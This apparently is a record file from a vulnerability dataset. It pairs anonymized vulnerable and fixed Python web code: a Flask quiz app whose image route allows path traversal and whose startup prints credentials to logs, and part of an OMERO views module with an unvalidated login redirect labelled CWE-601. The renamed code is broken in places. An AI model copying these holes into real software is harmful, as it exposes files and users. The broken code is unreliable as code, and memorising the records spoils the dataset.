VAR_17["correct"] = VAR_21
VAR_27 = random.choice(VAR_25.keywords)
VAR_27 = hint.replace("\\", "")
VAR_17["current_munhak"] = {
"munhak_seq": VAR_25.munhak_seq,
"source": VAR_25.source,
"category": VAR_25.category,
"hint": VAR_27,
"title": VAR_25.title,
"writer": VAR_25.writer
}
VAR_17["options"] = [munhak_row._asdict() for munhak_row in VAR_26]
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_25.category,
"hint": VAR_27,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in VAR_26
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
else:
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_17["current_munhak"]["category"],
"hint": VAR_17["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in VAR_17["options"]
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
@VAR_4.route('/quiz')
def FUNC_3():
return render_template("quiz/quiz_container.html")
@VAR_4.route("/answer", methods=["GET", "POST"])
def FUNC_4():
print(VAR_17)
VAR_20 = request.form.get("option", None)
if VAR_20 is None or (not type(VAR_20) != int):
return abort(400)
VAR_20 = int(VAR_20)
VAR_21 = VAR_17["correct"]
if VAR_21 is None:
return abort(401)
VAR_22 = VAR_17["current_munhak"]
if VAR_22 is None:
return abort(401)
if VAR_21 == VAR_20:
VAR_17["quiz_count"] += 1
VAR_17["solved_quiz"].append(VAR_22["munhak_seq"])
VAR_17["current_munhak"] = None
return "success"
else:
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
if "solved_quiz" not in VAR_17:
VAR_17["result"] = False
return "failed", 404
@VAR_4.route("/result", methods=["GET", "POST"])
def FUNC_5():
VAR_23 = VAR_17["result"]
VAR_16 = {
"is_success" : VAR_23,
"solved_count" : VAR_17["quiz_count"],
"correct" : VAR_17["correct"],
"current_munhak" : VAR_17["current_munhak"]
}
VAR_17["quiz_count"] = 0
VAR_17["solved_quiz"] = []
VAR_17["current_munhak"] = None
print(VAR_16)
return render_template("quiz/FUNC_5.html", VAR_16 = data)
@VAR_4.route('/update')
def FUNC_6():
if request.args.get("key", None) != VAR_4.config["SECRET_KEY"]:
return "error"
FUNC_0()
VAR_17.clear()
return f"success! {len(VAR_3)}"
@VAR_4.route('/images/<VAR_5:path>')
def FUNC_7(VAR_5):
def FUNC_8(VAR_5):
import os
VAR_28 = os.path.dirname(__file__) # <-- absolute dir the script is in
VAR_29 = VAR_5
VAR_30 = os.path.join(VAR_28, VAR_29)
return VAR_30
return send_file(
FUNC_8(f"./images/{VAR_5}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
VAR_4.run()
| import .configparser
from flask import Flask, render_template, VAR_17, request, flash, redirect, url_for, Response, abort, jsonify, send_file
from werkzeug.utils import safe_join
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from VAR_4.common.decorator import return_500_if_errors
VAR_0 = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
VAR_1 = socket.gethostname()
VAR_2 = None
VAR_3 = None
if VAR_1[:7] == "DESKTOP":
VAR_2 = True
else:
VAR_2 = False
VAR_4 = Flask(__name__)
def FUNC_0():
VAR_6 = gspread.authorize(VAR_14).open("문학따먹기")
VAR_7 = VAR_6.get_worksheet(0)
VAR_8 = VAR_7.get_all_values()
print(VAR_8)
try:
VAR_16 = []
for row in VAR_8[1:]:
VAR_31 = namedtuple("Munhak", VAR_8[0])(*row)
VAR_31 = VAR_31._replace(keywords=json.loads(VAR_31.keywords))
if VAR_31.is_available == "TRUE":
VAR_16.append(VAR_31)
except:
pass
global VAR_3
munhak_rows_data = VAR_16
print(VAR_16)
return
if VAR_2:
VAR_9 = configparser.ConfigParser()
VAR_9.read('config.ini')
VAR_10 = VAR_9['DEFAULT']['LOCAL_DB_USERNAME']
VAR_11 = VAR_9['DEFAULT']['LOCAL_DB_PASSWORD']
VAR_12 = VAR_9['DEFAULT']['LOCAL_DB_NAME']
VAR_13 = VAR_9['DEFAULT']['LOCAL_DB_HOSTNAME']
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=VAR_10,
DB_PASS=VAR_11,
DB_ADDR=VAR_13,
DB_NAME=VAR_12)
VAR_4.config["SECRET_KEY"] = VAR_9['DEFAULT']['SECRET_KEY']
VAR_14 = ServiceAccountCredentials.from_json_keyfile_name(VAR_9['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], VAR_0)
else:
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
VAR_4.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
VAR_14 = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), VAR_0)
FUNC_0()
@VAR_4.route('/')
def FUNC_1():
VAR_15 = copy.deepcopy(VAR_3)
VAR_16 = {
"total_munhak" : len(VAR_15),
"source_list" : sorted(set([munhak_row.source for munhak_row in VAR_15]))
}
print(VAR_16)
VAR_17["quiz_count"] = 0
return render_template("quiz/FUNC_1.html", VAR_16=data)
@VAR_4.route("/get-quiz")
def FUNC_2():
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
VAR_17["total_munhak"] = len(VAR_3)
if "solved_quiz" not in VAR_17:
VAR_17["solved_quiz"] = []
VAR_17["result"] = None
VAR_18 = VAR_17["quiz_count"] + 1
VAR_19 = VAR_17["solved_quiz"]
if "current_munhak" not in VAR_17 or VAR_17["current_munhak"] is None:
VAR_15 = copy.deepcopy(VAR_3)
VAR_24 = [munhak_row for munhak_row in VAR_15 if munhak_row.munhak_seq not in VAR_19]
if len(VAR_24) == 0:
VAR_17["result"] = True
return redirect(url_for("result"))
VAR_25 = random.choice(VAR_24)
for _ in [munhak_row for munhak_row in VAR_15 if munhak_row.title == VAR_25.title]:
VAR_15.remove(_)
random.shuffle(VAR_15)
VAR_26 = VAR_15[0:3] + [VAR_25]
random.shuffle(VAR_26)
VAR_21 = VAR_26.index(VAR_25)
print(VAR_21)
VAR_17["correct"] = VAR_21
VAR_27 = random.choice(VAR_25.keywords)
VAR_27 = hint.replace("\\", "")
VAR_17["current_munhak"] = {
"munhak_seq": VAR_25.munhak_seq,
"source": VAR_25.source,
"category": VAR_25.category,
"hint": VAR_27,
"title": VAR_25.title,
"writer": VAR_25.writer
}
VAR_17["options"] = [munhak_row._asdict() for munhak_row in VAR_26]
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_25.category,
"hint": VAR_27,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in VAR_26
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
else:
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_17["current_munhak"]["category"],
"hint": VAR_17["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in VAR_17["options"]
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
@VAR_4.route('/quiz')
def FUNC_3():
return render_template("quiz/quiz_container.html")
@VAR_4.route("/answer", methods=["GET", "POST"])
def FUNC_4():
print(VAR_17)
VAR_20 = request.form.get("option", None)
if VAR_20 is None or (not type(VAR_20) != int):
return abort(400)
VAR_20 = int(VAR_20)
VAR_21 = VAR_17["correct"]
if VAR_21 is None:
return abort(401)
VAR_22 = VAR_17["current_munhak"]
if VAR_22 is None:
return abort(401)
if VAR_21 == VAR_20:
VAR_17["quiz_count"] += 1
VAR_17["solved_quiz"].append(VAR_22["munhak_seq"])
VAR_17["current_munhak"] = None
return "success"
else:
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
if "solved_quiz" not in VAR_17:
VAR_17["result"] = False
return "failed", 404
@VAR_4.route("/result", methods=["GET", "POST"])
def FUNC_5():
VAR_23 = VAR_17["result"]
VAR_16 = {
"is_success" : VAR_23,
"solved_count" : VAR_17["quiz_count"],
"correct" : VAR_17["correct"],
"current_munhak" : VAR_17["current_munhak"]
}
VAR_17["quiz_count"] = 0
VAR_17["solved_quiz"] = []
VAR_17["current_munhak"] = None
print(VAR_16)
return render_template("quiz/FUNC_5.html", VAR_16 = data)
@VAR_4.route('/update')
def FUNC_6():
if request.args.get("key", None) != VAR_4.config["SECRET_KEY"]:
return "error"
FUNC_0()
VAR_17.clear()
return f"success! {len(VAR_3)}"
@VAR_4.route('/images/<VAR_5:path>')
def FUNC_7(VAR_5):
def FUNC_8(VAR_5):
import os
VAR_28 = os.path.dirname(__file__) # <-- absolute dir the script is in
VAR_29 = VAR_5
VAR_30 = safe_join(VAR_28, VAR_29)
return VAR_30
return send_file(
FUNC_8(f"./images/{VAR_5}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
VAR_4.run()
| [
2,
14,
16,
19,
22,
24,
29,
31,
32,
34,
36,
38,
42,
49,
50,
53,
57,
59,
60,
61,
65,
70,
76,
78,
80,
82,
88,
89,
90,
92,
93,
94,
103,
106,
107,
116,
119,
121,
122,
124,
126,
130,
132,
135,
137,
139,
143,
144,
145,
146,
147,
149,
152,
173,
176,
188,
190,
191,
192,
196,
197,
208,
212,
217,
220,
224,
226,
228,
229,
230,
233,
234,
236,
237,
247,
250,
251,
253,
255,
258,
262,
263,
272,
279,
280,
282,
284
] | [
2,
15,
17,
20,
23,
25,
30,
32,
33,
35,
37,
39,
43,
50,
51,
54,
58,
60,
61,
62,
66,
71,
77,
79,
81,
83,
89,
90,
91,
93,
94,
95,
104,
107,
108,
117,
120,
122,
123,
125,
127,
131,
133,
136,
138,
140,
144,
145,
146,
147,
148,
150,
153,
174,
177,
189,
191,
192,
193,
197,
198,
209,
213,
218,
221,
225,
227,
229,
230,
231,
234,
235,
237,
238,
248,
251,
252,
254,
256,
259,
263,
264,
273,
280,
281,
283,
285
] |
4CWE-601
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm, BasketShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
""" Keeps the OMERO session alive by pinging the server """
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
url = url or reverse("webindex")
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = request.GET.get("active_group")
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
switch_active_group(request, first_sel.details.group.id.val)
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId,
]
groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
groups = [g for g in groups if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
"template": "webclient/base/includes/group_user_content.html",
"current_url": url,
"groups": groups,
"myGroups": myGroups,
}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get the groups
groups = tree.marshal_groups(
conn=conn, member_id=member_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": groups})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest("Invalid experimenter id")
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id
)
if experimenter is None:
raise Http404("No Experimenter found with ID %s" % experimenter_id)
return JsonResponse({"experimenter": experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
experimenter_id = get_long_or_default(request, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
r = dict()
try:
# Get the projects
r["projects"] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned datasets (without project parents)
r["datasets"] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the screens for the current user
r["screens"] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned plates (without project parents)
r["plates"] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned images container
try:
orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
orph_t = {"enabled": True}
if (
conn.isAdmin()
or conn.isLeader(gid=request.session.get("active_group"))
or experimenter_id == conn.getUserId()
or orph_t.get("enabled", True)
):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
orphaned["name"] = orph_t.get("name", "Orphaned Images")
r["orphaned"] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
project_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the datasets
datasets = tree.marshal_datasets(
conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
"""Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
dataset_id = get_long_or_default(request, "id", None)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
thumb_version = get_bool_or_default(request, "thumbVersion", False)
date = get_bool_or_default(request, "date", False)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
try:
# Get the images
images = tree.marshal_images(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
screen_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the plates
plates = tree.marshal_plates(
